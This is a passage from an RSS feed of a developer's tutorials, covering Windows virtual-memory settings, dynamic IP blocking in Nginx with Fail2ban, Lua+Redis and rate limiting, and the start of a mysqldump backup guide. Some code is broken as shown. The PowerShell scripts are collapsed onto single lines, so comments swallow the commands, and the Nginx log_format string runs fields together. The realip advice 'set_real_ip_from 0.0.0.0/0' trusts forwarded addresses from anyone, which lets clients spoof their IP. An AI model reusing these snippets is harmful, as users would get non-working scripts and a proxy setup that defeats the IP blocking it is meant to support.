&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa6jqvud78z24afcfwrnk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa6jqvud78z24afcfwrnk.png" width="800" height="664"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Uncheck “Automatically manage paging file size for all drives”, then select the partition where you want to set virtual memory (e.g., Drive D, preferably an SSD partition) from the list below.&lt;/li&gt;
&lt;li&gt;  Select “Custom size”, enter the “Initial size” and “Maximum size” (refer to the table above, unit: MB), click [Set] → [OK].&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk7jdpn7wqyl84mg2wpy6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk7jdpn7wqyl84mg2wpy6.png" width="800" height="656"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Restart the computer for the settings to take effect.&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Method 2: Manage via WMIC Command Line (Suitable for Batch Operations)
&lt;/h3&gt;

&lt;p&gt;Suitable for IT administrators or scenarios where multiple computers need to be configured quickly. Run Command Prompt as administrator:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Right-click the “Start” menu and select [Terminal (Admin)]; in Windows Terminal, press &lt;strong&gt;Ctrl + Shift + 2&lt;/strong&gt; to open a new tab with the second profile (Command Prompt by default).&lt;/li&gt;
&lt;li&gt; Execute the following commands according to needs (copy and paste directly, note to modify the drive letter and values):&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8wxv4pmosgx8zycnpwtb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8wxv4pmosgx8zycnpwtb.png" width="800" height="739"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Enable automatic virtual memory management&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic computersystem where name="%computername%" set AutomaticManagedPagefile=True
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foadlxrrm4abqwqy8m4w2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foadlxrrm4abqwqy8m4w2.png" width="800" height="433"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Disable automatic management (prepare for customization)&lt;/strong&gt; :&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic computersystem where name="%computername%" set AutomaticManagedPagefile=False
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;View current virtual memory settings&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic pagefile list /format:list
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bomtzzexsbtgouvjn86.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bomtzzexsbtgouvjn86.png" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Set virtual memory for a specific drive (e.g., Drive C) (Example: Initial 4GB, Maximum 8GB)&lt;/strong&gt; :&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wmic pagefileset where name="C:\pagefile.sys" set InitialSize=4096,MaximumSize=8192
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;If you encounter a “wmic is not recognized” error (WMIC is deprecated and no longer preinstalled on recent Windows 11 builds), enable it with the following command:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;DISM /Online /Add-Capability /CapabilityName:WMIC~~~~
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Restart the computer after execution for the settings to take effect.&lt;/p&gt;

&lt;h3&gt;
  
  
  Method 3: Set via PowerShell Script (Preferred for Advanced Users)
&lt;/h3&gt;

&lt;p&gt;PowerShell is more flexible than Command Prompt, supporting batch configuration and scripting:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6mrmuoqdoy4q2pvcag1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6mrmuoqdoy4q2pvcag1.png" width="800" height="727"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Open Windows Terminal as administrator; press &lt;strong&gt;Ctrl + Shift + 1&lt;/strong&gt; to open a new tab with the first profile (PowerShell by default).&lt;/li&gt;
&lt;li&gt; Execute the following commands to complete corresponding operations:&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;View detailed current virtual memory settings&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Get-CimInstance -ClassName Win32_PageFileUsage | Select-Object Name,InitialSize,MaximumSize,CurrentUsage
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8v0th3ew6jknalqnmbz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8v0th3ew6jknalqnmbz.png" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Customize virtual memory (Example: Drive E, Initial 2GB, Maximum 6GB)&lt;/strong&gt; :&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Define parameters $pageFilePath = "E:\pagefile.sys" $initialSize = 2048 # Initial size (MB) $maximumSize = 6144 # Maximum size (MB) # Apply settings Set-CimInstance -Query "SELECT * FROM Win32_PageFileSetting WHERE Name ='$pageFilePath'" -Property @{InitialSize = $initialSize MaximumSize = $maximumSize }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Restore automatic management&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$pageFilePath = "E:\pagefile.sys" Set-CimInstance -Query "SELECT * FROM Win32_PageFileSetting WHERE Name ='$pageFilePath'" -Property @{InitialSize = 0 MaximumSize = 0 }&lt;br&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  5. Common Issues: No Effect After Setting Virtual Memory? Avoid These Pitfalls
&lt;/h2&gt;


&lt;p&gt;Many users report that performance doesn’t improve after settings, or even becomes slower. Most likely, they’ve fallen into the following 3 pitfalls:&lt;/p&gt;

&lt;h3&gt;
  
  
  Pitfall 1: Virtual Memory Set on Mechanical Hard Drive
&lt;/h3&gt;

&lt;p&gt;The read-write speed of mechanical hard drives is much lower than RAM. Even if a large virtual memory size is set, lag will occur due to “too slow data exchange”. Solution: Migrate to an SSD partition.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pitfall 2: Large Gap Between Initial Size and Maximum Size
&lt;/h3&gt;

&lt;p&gt;If the initial size is 1GB and the maximum size is 20GB, the system will frequently “expand” virtual memory, causing a lot of hard drive fragmentation and slowing down the speed. Solution: Set both to the same value.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pitfall 3: Severely Insufficient Physical Memory but Relying Only on Virtual Memory
&lt;/h3&gt;

&lt;p&gt;If your computer only has 4GB RAM but you want to run Chrome (10 tabs) + Photoshop + WeChat at the same time, even if virtual memory is set to 12GB, lag will occur due to frequent paging. &lt;strong&gt;Ultimate Solution: Upgrade physical memory (RAM)&lt;/strong&gt; , which is the most fundamental way to improve multitasking performance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion: The “Golden Rules” for Virtual Memory Settings
&lt;/h2&gt;

&lt;p&gt;Virtual memory is a “memory buffer” for Windows systems, but not a “panacea”. Remember the following 3 points to achieve scientific configuration:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Prioritize physical memory&lt;/strong&gt;: 8GB is the entry threshold, 16GB is the current mainstream, and 32GB or more is suitable for professional scenarios;&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Virtual memory “just enough is best”&lt;/strong&gt; : Match the size according to RAM capacity, don’t blindly pursue “the larger the better”;&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Choose the right partition for storage location&lt;/strong&gt;: Prefer free NVMe SSD partitions, stay away from system drives and mechanical hard drives.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After setting up according to the methods in this article, you will find that the multitasking capability and stability of your computer have significantly improved. If you encounter specific problems, feel free to leave a comment below and I will answer them one by one.&lt;/p&gt;

</description>
      <category>windows</category>
      <category>virtualmemory</category>
    </item>
    <item>
      <title>Practical Guide to Dynamic IP Blocking in Nginx</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sun, 16 Nov 2025 13:42:37 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/practical-guide-to-dynamic-ip-blocking-in-nginx-3k0j</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/practical-guide-to-dynamic-ip-blocking-in-nginx-3k0j</guid>
      <description>&lt;p&gt;Blocking IPs dynamically in Nginx can effectively protect websites or applications from malicious requests, crawlers, or DDoS attacks. Compared to the traditional static method of modifying the configuration file and reloading Nginx, dynamic IP blocking can automatically identify and block malicious IPs in real-time, greatly enhancing security and operational efficiency. This article will elaborate on three mainstream solutions, combined with practical configurations and application scenarios, to help you implement them quickly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article: &lt;a href="https://devresourcehub.com/practical-guide-to-dynamic-ip-blocking-in-nginx.html" rel="noopener noreferrer"&gt;Practical Guide to Dynamic IP Blocking in Nginx&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jqk5mkd9yudvwh5jxik.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jqk5mkd9yudvwh5jxik.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Solutions for Dynamic IP Blocking
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Fail2ban Tool
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Method&lt;/strong&gt;: It monitors Nginx logs, and when a certain threshold is reached, it calls the firewall or modifies the configuration to block the IP.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Advantages&lt;/strong&gt;: Easy to configure, has a mature community, and supports multiple services.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Disadvantages&lt;/strong&gt;: Depends on log analysis, has a delay, and frequent reloads can affect performance.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Applicable Scenarios&lt;/strong&gt;: Protects against brute-force attacks, scanner attacks, and abnormal request attacks.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Nginx Lua + Redis
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Method&lt;/strong&gt;: Uses ngx_lua to query the Redis blacklist during the access phase.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Advantages&lt;/strong&gt;: High performance, takes effect in real-time, and can be shared distributively.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Disadvantages&lt;/strong&gt;: Requires OpenResty/Lua, and the architecture is complex.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Applicable Scenarios&lt;/strong&gt;: High-concurrency scenarios, distributed shared blacklists, and refined strategies.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Nginx Built-in Modules
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Method&lt;/strong&gt;: Uses the &lt;code&gt;limit_req_zone&lt;/code&gt; and &lt;code&gt;limit_conn_zone&lt;/code&gt; directives to limit request frequency and concurrent connections per client.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Advantages&lt;/strong&gt;: Native support, no third-party dependencies required.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Disadvantages&lt;/strong&gt;: Only limits traffic and connections, and cannot truly block IPs.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Applicable Scenarios&lt;/strong&gt;: Protects against CC attacks and prevents single-IP abuse.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Configuration Key Points for Each Solution
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Dynamic Blocking with Fail2ban
&lt;/h3&gt;

&lt;p&gt;Fail2ban monitors Nginx logs (such as 403/401/404 error codes, IPs with overly frequent access) and dynamically calls iptables or firewalld to block IPs. The core steps are as follows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Install Fail2ban&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  On Debian/Ubuntu: &lt;code&gt;sudo apt-get install fail2ban&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  On CentOS/RHEL: &lt;code&gt;sudo yum install fail2ban&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Configure Nginx Logs&lt;/strong&gt;:&lt;br&gt;&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;

&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;log_format main '$remote_addr - $remote_user [$time_local]"$request"''$status $body_bytes_sent "$http_referer" ''"$http_user_agent""$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Create a Filter Rule&lt;/strong&gt; &lt;code&gt;/etc/fail2ban/filter.d/nginx-cc.conf&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Definition]
failregex = ^&amp;lt;HOST&amp;gt; -.*"(GET|POST).*HTTP.*" 403
ignoreregex =
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
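&lt;p&gt;Before deploying a filter, it’s worth checking the &lt;code&gt;failregex&lt;/code&gt; against a sample access-log line (Fail2ban itself ships a &lt;code&gt;fail2ban-regex&lt;/code&gt; tool for this). A rough Python approximation: Fail2ban substitutes &lt;code&gt;&amp;lt;HOST&amp;gt;&lt;/code&gt; with an address-matching group, which is simplified here to &lt;code&gt;\S+&lt;/code&gt;, and the sample log line is invented for illustration:&lt;/p&gt;

```python
import re

FAILREGEX = r'^<HOST> -.*"(GET|POST).*HTTP.*" 403'

def match_host(line: str):
    """Return the offending IP if the line matches the filter, else None."""
    # fail2ban expands <HOST> to a host/IP pattern; \S+ is a simplification
    pattern = FAILREGEX.replace("<HOST>", r"(?P<host>\S+)")
    m = re.search(pattern, line)
    return m.group("host") if m else None
```

&lt;p&gt;A 403 line yields the client address for banning, while a normal 200 line is ignored, which is exactly the behavior the jail below counts against &lt;code&gt;maxretry&lt;/code&gt;.&lt;/p&gt;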



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Configure Jail&lt;/strong&gt; &lt;code&gt;/etc/fail2ban/jail.local&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[nginx-cc]
enabled = true
port = http,https
filter = nginx-cc
logpath = /var/log/nginx/access.log
maxretry = 100
findtime = 60
bantime = 3600
action = iptables[name=NGINX, port=http, protocol=tcp]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Start the Service&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo systemctl enable fail2ban
sudo systemctl restart fail2ban
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Dynamic Blocking with Nginx Lua + Redis
&lt;/h3&gt;

&lt;p&gt;This solution depends on OpenResty (which integrates Nginx + LuaJIT) and queries the Redis blacklist immediately when a request arrives, with extremely high efficiency. The core steps are as follows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Install OpenResty&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo yum install yum-utils
sudo yum-config-manager --add-repo https://openresty.org/package/centos/openresty.repo
sudo yum install openresty
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Configure Nginx&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http {
    lua_shared_dict ip_blacklist 10m;
    server {
        listen 80;
        location / {
            access_by_lua_file /etc/nginx/lua/ip_blacklist.lua;
        }
    }
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Write the Lua Script&lt;/strong&gt; &lt;code&gt;/etc/nginx/lua/ip_blacklist.lua&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;local redis = require "resty.redis"
local red = redis:new()
red:set_timeout(1000)
local ok, err = red:connect("127.0.0.1", 6379)
if not ok then
    ngx.log(ngx.ERR, "Redis connection failed:", err)
    return
end
local client_ip = ngx.var.remote_addr
local is_banned = red:sismember("ip_blacklist", client_ip)
if is_banned == 1 then
    ngx.exit(ngx.HTTP_FORBIDDEN)
end
red:set_keepalive(10000, 100)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Manage the Blacklist&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  To ban an IP: &lt;code&gt;redis-cli SADD ip_blacklist 192.168.1.100&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  To unban an IP: &lt;code&gt;redis-cli SREM ip_blacklist 192.168.1.100&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;
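&lt;p&gt;The &lt;code&gt;SADD&lt;/code&gt;/&lt;code&gt;SREM&lt;/code&gt; commands above maintain a permanent set; a common refinement is to give each ban a time-to-live. As an in-memory sketch of that semantics (class and method names are invented; a real deployment would typically use per-IP Redis keys with &lt;code&gt;EXPIRE&lt;/code&gt; instead of a set):&lt;/p&gt;

```python
import time

class Blacklist:
    """In-memory model of an IP blacklist with optional per-IP expiry."""
    def __init__(self):
        self._banned = {}  # ip -> expiry timestamp, or None for a permanent ban

    def ban(self, ip: str, seconds=None):
        self._banned[ip] = None if seconds is None else time.time() + seconds

    def unban(self, ip: str):
        self._banned.pop(ip, None)

    def is_banned(self, ip: str) -> bool:
        if ip not in self._banned:
            return False
        expiry = self._banned[ip]
        if expiry is not None and time.time() > expiry:
            del self._banned[ip]  # lazy expiry, similar to a Redis TTL
            return False
        return True
```

&lt;p&gt;This mirrors the layered strategy discussed later: short bans for bursts, long or permanent bans for repeat offenders.&lt;/p&gt;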

&lt;h3&gt;
  
  
  Rate Limiting with Nginx Built-in Modules
&lt;/h3&gt;

&lt;p&gt;Nginx has built-in limit_req_zone and limit_conn_zone modules, which can limit the request rate and the number of concurrent connections. Although they cannot truly block IPs, they can effectively mitigate CC attacks. The configuration example is as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http {
    limit_req_zone $binary_remote_addr zone=req_limit:10m rate=10r/s;
    limit_conn_zone $binary_remote_addr zone=conn_limit:10m;
    server {
        location / {
            limit_req zone=req_limit burst=20 nodelay;
            limit_conn conn_limit 10;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Effect: Requests exceeding the limit will return a 503 Service Temporarily Unavailable response.&lt;/p&gt;
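
&lt;p&gt;If you prefer the semantically more accurate 429 Too Many Requests over the default 503, Nginx (1.3.15 and later) provides the limit_req_status and limit_conn_status directives. A minimal sketch building on the configuration above:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http {
    limit_req_zone $binary_remote_addr zone=req_limit:10m rate=10r/s;
    limit_conn_zone $binary_remote_addr zone=conn_limit:10m;
    server {
        location / {
            limit_req zone=req_limit burst=20 nodelay;
            limit_conn conn_limit 10;
            limit_req_status 429;   # default is 503
            limit_conn_status 429;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;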

&lt;h2&gt;
  
  
  Practical Experience and Precautions
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Obtain the Real Client IP&lt;/strong&gt;: Behind a CDN or reverse proxy, &lt;code&gt;$remote_addr&lt;/code&gt; holds the proxy’s address, so configure the realip module to recover the client’s true IP:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;set_real_ip_from 0.0.0.0/0;
real_ip_header X-Forwarded-For;
real_ip_recursive on;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Combined Measures are More Effective&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Fail2ban → Blocks IPs with malicious behaviors.&lt;/li&gt;
&lt;li&gt;  Nginx built-in rate limiting → Protects against instantaneous high-frequency attacks.&lt;/li&gt;
&lt;li&gt;  Lua + Redis → Enables distributed real-time blacklists.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Layered Blocking Strategies&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Instant protection: Use limit_req/limit_conn.&lt;/li&gt;
&lt;li&gt;  Short-term blocking: Employ Fail2ban (from minutes to hours).&lt;/li&gt;
&lt;li&gt;  Long-term global blocking: Utilize Lua + Redis (for days or even permanently).&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;There are three main ways to implement dynamic IP blocking in Nginx:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Fail2ban: Log-driven, suitable for single-machine and simple scenarios.&lt;/li&gt;
&lt;li&gt;  Nginx Lua + Redis: High-performance real-time blacklist, suitable for distributed and large-scale businesses.&lt;/li&gt;
&lt;li&gt;  Nginx built-in modules: Native rate limiting and connection limiting, suitable for dealing with CC attacks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In practice: for single machines, use Fail2ban plus the built-in rate limiting; for distributed or high-concurrency scenarios, use Lua + Redis plus the built-in rate limiting. This achieves quick results while preserving long-term scalability.&lt;/p&gt;

</description>
      <category>nginx</category>
      <category>security</category>
    </item>
    <item>
      <title>Complete Guide to MySQL Backup: mysqldump Syntax, Advanced Tips &amp; Restoration Practice</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Thu, 06 Nov 2025 07:11:14 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-mysql-backup-mysqldump-syntax-advanced-tips-restoration-practice-ape</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-mysql-backup-mysqldump-syntax-advanced-tips-restoration-practice-ape</guid>
      <description>&lt;p&gt;For backend developers, database administrators (DBAs), and DevOps engineers, &lt;strong&gt;MySQL data backup&lt;/strong&gt; is a core component of ensuring business continuity. Whether addressing server failures, human errors, or data migration needs, a reliable backup strategy prevents catastrophic data loss. As a built-in command-line backup tool for MySQL, &lt;strong&gt;mysqldump&lt;/strong&gt; stands out as the top choice for small to medium-sized database backups due to its lightweight design, flexibility, and strong compatibility. This article breaks down mysqldump usage from basic syntax to enterprise-grade advanced techniques, helping you build a secure and efficient MySQL backup system.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/complete-guide-to-mysql-backup-mysqldump-syntax-advanced-tips-restoration-practice.html" rel="noopener noreferrer"&gt;# Complete Guide to MySQL Backup: mysqldump Syntax, Advanced Tips &amp;amp; Restoration Practice&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I. mysqldump Basic Syntax: From Beginner to Pro
&lt;/h2&gt;

&lt;p&gt;The core function of mysqldump is to export data and table structures from a MySQL database into a SQL text file. Its basic command format follows the logic of “parameters + target + output”. Mastering basic syntax is the foundation for meeting diverse backup requirements.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 Standard Command for Backing Up a Single Database
&lt;/h3&gt;

&lt;p&gt;The most common scenario is backing up a specific database, with the full command as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u [username] -p[password] [database_name] &amp;gt; [output_file.sql]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Detailed explanation of each parameter:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;-u [username]&lt;/strong&gt; : Specifies the username for connecting to MySQL, such as root or a dedicated account with backup permissions.&lt;/li&gt;
